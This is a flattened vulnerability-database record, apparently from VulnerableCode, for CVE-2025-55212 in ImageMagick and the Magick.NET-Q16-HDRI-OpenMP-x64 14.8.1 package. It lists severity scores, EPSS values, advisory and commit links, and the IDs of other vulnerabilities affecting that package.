scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-55212.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-55212
reference_id
reference_type
scores
0
value 0.00284
scoring_system epss
scoring_elements 0.51873
published_at 2026-04-21T12:55:00Z
1
value 0.00284
scoring_system epss
scoring_elements 0.51788
published_at 2026-04-02T12:55:00Z
2
value 0.00284
scoring_system epss
scoring_elements 0.51813
published_at 2026-04-04T12:55:00Z
3
value 0.00284
scoring_system epss
scoring_elements 0.51775
published_at 2026-04-07T12:55:00Z
4
value 0.00284
scoring_system epss
scoring_elements 0.51829
published_at 2026-04-08T12:55:00Z
5
value 0.00284
scoring_system epss
scoring_elements 0.51827
published_at 2026-04-09T12:55:00Z
6
value 0.00284
scoring_system epss
scoring_elements 0.51878
published_at 2026-04-11T12:55:00Z
7
value 0.00284
scoring_system epss
scoring_elements 0.51858
published_at 2026-04-12T12:55:00Z
8
value 0.00284
scoring_system epss
scoring_elements 0.51843
published_at 2026-04-13T12:55:00Z
9
value 0.00284
scoring_system epss
scoring_elements 0.51885
published_at 2026-04-16T12:55:00Z
10
value 0.00284
scoring_system epss
scoring_elements 0.51892
published_at 2026-04-18T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-55212
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-55212
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-55212
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.8.1
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value LOW
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-08-26T19:36:13Z/
url https://github.com/dlemstra/Magick.NET/releases/tag/14.8.1
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/blob/0ba1b587be17543b664f7ad538e9e51e0da59d17/MagickCore/geometry.c#L355
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value LOW
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-08-26T19:36:13Z/
url https://github.com/ImageMagick/ImageMagick/blob/0ba1b587be17543b664f7ad538e9e51e0da59d17/MagickCore/geometry.c#L355
7
reference_url https://github.com/ImageMagick/ImageMagick/blob/0ba1b587be17543b664f7ad538e9e51e0da59d17/MagickCore/resize.c#L4625-L4629
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value LOW
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-08-26T19:36:13Z/
url https://github.com/ImageMagick/ImageMagick/blob/0ba1b587be17543b664f7ad538e9e51e0da59d17/MagickCore/resize.c#L4625-L4629
8
reference_url https://github.com/ImageMagick/ImageMagick/commit/5f0bcf986b8b5e90567750d31a37af502b73f2af
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value LOW
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-08-26T19:36:13Z/
url https://github.com/ImageMagick/ImageMagick/commit/5f0bcf986b8b5e90567750d31a37af502b73f2af
9
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-fh55-q5pj-pxgw
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value LOW
scoring_system cvssv3.1_qr
scoring_elements
2
value LOW
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-08-26T19:36:13Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-fh55-q5pj-pxgw
10
reference_url https://lists.debian.org/debian-lts-announce/2025/09/msg00012.html
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value LOW
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2025/09/msg00012.html
11
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-55212
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-55212
12
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1111587
reference_id 1111587
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1111587
13
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2391088
reference_id 2391088
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2391088
14
reference_url https://github.com/advisories/GHSA-fh55-q5pj-pxgw
reference_id GHSA-fh55-q5pj-pxgw
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-fh55-q5pj-pxgw
15
reference_url https://usn.ubuntu.com/7756-1/
reference_id USN-7756-1
reference_type
scores
url https://usn.ubuntu.com/7756-1/
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.8.1
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.8.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-15ny-qqbj-qyfk
1
vulnerability VCID-1cpn-zvem-v7gt
2
vulnerability VCID-29r3-kvf4-n3hc
3
vulnerability VCID-2gw3-qfan-jygd
4
vulnerability VCID-2zje-ag2v-7kac
5
vulnerability VCID-54da-fzyt-4ud2
6
vulnerability VCID-569d-6nue-5kbq
7
vulnerability VCID-5uyd-bv33-h7g1
8
vulnerability VCID-5zkt-kcgx-a3e2
9
vulnerability VCID-62ar-kwbq-nyh3
10
vulnerability VCID-69f6-ceje-hyah
11
vulnerability VCID-6h7x-3rue-kucp
12
vulnerability VCID-6meg-yjby-a7gj
13
vulnerability VCID-6rma-wjdv-uqe9
14
vulnerability VCID-6ztv-auh8-27gx
15
vulnerability VCID-acsa-1uwk-fqee
16
vulnerability VCID-anyp-2jr7-73a1
17
vulnerability VCID-b43n-3d1g-u3fe
18
vulnerability VCID-b5pd-kk97-gban
19
vulnerability VCID-bd1g-sfsp-37h7
20
vulnerability VCID-bw4q-dt1r-y3e4
21
vulnerability VCID-cbqr-aybx-d3e6
22
vulnerability VCID-cuhw-ew1g-s3h2
23
vulnerability VCID-d8yf-8rff-3yhf
24
vulnerability VCID-dabd-m3mf-3ker
25
vulnerability VCID-dtza-65ku-aber
26
vulnerability VCID-emmr-15qp-vfah
27
vulnerability VCID-f1zu-xb4j-8qhp
28
vulnerability VCID-fnck-7mvx-hqc9
29
vulnerability VCID-g41y-dv8u-3yf1
30
vulnerability VCID-gdg8-aejn-83c4
31
vulnerability VCID-h221-qd8d-tqa5
32
vulnerability VCID-jc5m-7rvc-2qg6
33
vulnerability VCID-jcjk-s89c-mbbm
34
vulnerability VCID-jvq6-xjbu-fkb9
35
vulnerability VCID-kdw5-8y5z-zya5
36
vulnerability VCID-kefv-kpkk-wudf
37
vulnerability VCID-mntx-6yku-3qcx
38
vulnerability VCID-mxg1-261s-nbds
39
vulnerability VCID-n47w-r932-abey
40
vulnerability VCID-p5aw-n691-nkff
41
vulnerability VCID-pcme-bwan-3bcf
42
vulnerability VCID-r3vw-ncns-cqgb
43
vulnerability VCID-rbdg-vz8x-ykah
44
vulnerability VCID-rj9n-ra1t-77dy
45
vulnerability VCID-rjkf-pdny-2fhn
46
vulnerability VCID-sd54-b8z1-2fg7
47
vulnerability VCID-sd7w-6qv5-73ge
48
vulnerability VCID-sdc2-fcap-abaz
49
vulnerability VCID-spch-fffg-4yc5
50
vulnerability VCID-sw7g-hxxr-n3e1
51
vulnerability VCID-tv15-dcnu-pbbn
52
vulnerability VCID-utfe-h3b7-jqcj
53
vulnerability VCID-uvpj-a8v5-ebgz
54
vulnerability VCID-vaks-d4k5-zue7
55
vulnerability VCID-vkp6-wh22-eqap
56
vulnerability VCID-vpdn-g1k9-1kdn
57
vulnerability VCID-x44m-x33k-hydn
58
vulnerability VCID-x8c6-9pse-xkc8
59
vulnerability VCID-xbsu-ac6g-53fn
60
vulnerability VCID-y4hn-6bv6-jugw
61
vulnerability VCID-y58b-be93-hbfd
62
vulnerability VCID-yx7r-r7ez-7uhp
63
vulnerability VCID-z9t9-bxf9-hkfk
64
vulnerability VCID-zab9-9tqj-hbhg
65
vulnerability VCID-zpcy-nms7-kuha
66
vulnerability VCID-zx14-t8et-ufcq
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.8.1
aliases CVE-2025-55212, GHSA-fh55-q5pj-pxgw
risk_score 1.6
exploitability 0.5
weighted_severity 3.3
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-uwj5-1fkf-7qg9
Risk_score4.0
Resource_urlhttp://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.8.1